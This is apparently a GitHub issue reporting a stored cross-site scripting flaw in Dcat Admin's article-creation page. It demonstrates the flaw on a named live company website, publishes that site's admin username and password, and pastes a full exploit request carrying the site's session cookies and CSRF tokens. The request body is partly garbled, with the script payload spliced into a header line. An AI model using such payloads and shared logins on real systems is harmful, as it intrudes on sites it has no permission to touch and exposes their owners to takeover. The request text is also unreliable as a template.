Dcat Admin v2.2.0-beta There is an xss cross-site scripting vulnerability exists /admin/articles/create #4
Comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
{{ message }}
The vulnerability exists: http://gzjs.lizhong.com.cn/admin/auth/login,this is a chinese company site, if you can't access, please use vpn to access this site.
The username is admin, password is admin
Insert xss cross-site scripting attack code
payload
<script>alert("1");</script>this operation will trigger xss payload
Everytime click this new article can trigger xss payload, so this a Stored XSS vulnerability
poc
`POST /admin/articles HTTP/1.1
Host: gzjs.lizhong.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: cCDnL0JDntXSzT9WcJEq4B1RrlNcOHHzRE7eosRW
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------18231965531676293850890598005
Content-Length: 4164
Origin: http://gzjs.lizhong.com.cn
Connection: close
Cookie: Hm_lvt_6d6cdee566cc672070f704327371cc88=1727264615; XSRF-TOKEN=eyJpdiI6IlJmWlozMnhTRnEyazRTMTh6ZzlLS0E9PSIsInZhbHVlIjoiMjl3Y01GYWxTTjVVcHpiWHlQK3ZqRzFhRkxrMC9HdkJIL1hPWERudjl0NmVyUjVDdkR4eE9PMUNHTjdJYnJiWm1vM2s5UjR4YmdzM3ZxZU1ZbmxzQlFaRmM4Z2ZGRXpWS1NZS0RhV28xeXIxY0hMLzIwU0dDOFFITWRyVG45L0EiLCJtYWMiOiI1NWQyZTk5YzgyZjFmMmZjNDcxOWRiMmY4YWI1ZWE0MjRiYWI2OGY4OWUwZjIyMmQwN2U3Y2Y5MjExODEzODIyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBXSGo1R0VzOVhxY1FHMUxqR1ZkR3c9PSIsInZhbHVlIjoiaTE5WjUvWnFCRUdRSXBYRy9meGhMbjdPektrck1ramdWQ2lPbUdxbmtzNGRDVGg4TTJONG1qUlRJbGs3bDBicWxXSG5XcVhvWm1Oam1GdW1XTllnUjVaL1lKKzMzVDBiYkxLT3UyWDVNRmYyYitFbE5JK0c0ZnFjTTNjNzdLL3IiLCJtYWMiOiJhODAzMjI2MjZlNmNiYTQ0NWZhNzE5ZTg4ZTg5ZGIyN2MyZDVkNjAwNjFjNDhiMDFkYWEwYjE3M2ZhODVhMDlmIiwidGFnIjoiIn0%3D
Priority: u=0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="category_id"
this operation will trigger xss payload
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="category_id"
-----------------------------18231965531676293850890598005
<script>alert("1");</script>Content-Disposition: form-data; name="title"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="en_title"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="description"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="author"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="source"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="module_id"
1
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="is_top"
0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="is_hot"
0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="sort"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="thumb"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="image"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="pic_list"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="pic_list_2"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="pic_list_3"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="content"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="content_2"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="state"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="state"
0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="time"
2024-11-16 01:47:34
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="seo_title"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="seo_keyword"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="seo_description"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="previous"
http://gzjs.lizhong.com.cn/admin/articles
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="previous"
http://gzjs.lizhong.com.cn/admin/articles
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="_token"
cCDnL0JDntXSzT9WcJEq4B1RrlNcOHHzRE7eosRW
-----------------------------18231965531676293850890598005--`
The text was updated successfully, but these errors were encountered: